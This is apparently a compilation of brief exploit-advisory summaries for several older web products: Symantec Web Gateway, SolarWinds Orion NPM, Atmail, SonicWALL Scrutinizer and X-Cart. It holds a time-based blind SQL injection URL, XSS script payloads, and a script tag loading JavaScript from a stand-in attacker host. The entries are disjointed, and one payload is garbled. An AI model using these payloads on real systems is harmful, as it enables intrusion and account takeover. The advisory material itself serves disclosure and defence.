A Blind SQL Injection vulnerability exists in Symantec Web Gateway 5.0.3.18. An attacker can exploit this vulnerability by accessing certain URLs which will create a new trigger that will create a user account on the victim database. An authenticated user can initiate a reboot of the remote system by accessing the URL which will execute the trigger and create a new user account.
This exploit targets a time-based blind SQL injection vulnerability in Symantec Web Gateway 5.0.2. It allows an attacker to extract the admin hash from the users table in the database. The exploit uses a loop to iterate through each character of the hash, and a BENCHMARK() function to measure the time taken to execute the query. If the query takes longer than the specified time, the character is assumed to be correct.
You can access all Atmail Webadmin mail server configuration and the SQL root password by going to the webmail and config directory and typing dbconfig.ini to access all SQL configuration.
An attacker can modify their snmpd.conf file with malicious JavaScript as follows: sysName <script>alert(124)</script>pt>> In addition, there is a Blind SQL Injection vulnerability in the file 'WrVMwareHostList.asp'. By sending a specially crafted malicious JavaScript payload, the SQLi can be exploited to add a new database administrator to the system, leading to remote code execution. Blind SQLi Proof of Concept: WrVMwareHostList.asp?sGroupList=1;WAITFOR DELAY '0:0:10'--&sDeviceList=3 The JavaScript code below will exploit the blind SQL injection vulnerability, enable xp_cmdshell on the target, upload a reverse shell to the target, and execute it.
A SQL injection vulnerability exists in Dell SonicWALL Scrutinizer 9.0.1. The vulnerability is due to insufficient sanitization of user-supplied input in the 'q' parameter of the 'statusFilter.php' script. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the context of the application. This may allow the attacker to gain access to sensitive information stored in the database.
This module exploits a vulnerability found in EGallery 1.2. By abusing the uploadify.php file, a malicious user can upload a file to the egallery/ directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on Ubuntu 10.04.
This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string of data in the Connection header to cause an overflow on the stack when the function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
SolarWinds Orion Network Performance Monitor (NPM) is vulnerable to persistent XSS when scanning a remote system containing malicious JavaScript in its snmpd.conf file. The vulnerable fields were determined to be: syslocation <script>alert('location')</script>, syscontact <script>alert('contact')</script>, sysName <script>alert('name')</script>. In addition, NPM is also vulnerable to CSRF attacks despite the fact that it makes use of VIEWSTATE protection. Through a combination of XSS and CSRF, a user can be added to the web application by configuring the snmpd.conf file to point to an attacker-controlled JavaScript file: syscontact <script src="http://attacker/evil.js"></script>
X-Cart Gold implements a degree of XSS filtering, but it is incomplete. The "symb" parameter of "products_map.php" is vulnerable to XSS, and the filter can be bypassed by using HTML anchor methods and URL encoding.
By sending an email to a user with the Atmail administrative interface open, we can call a remote JavaScript file that will initiate the installation of a specially crafted plugin file via CSRF, enabling remote code execution on the Atmail server.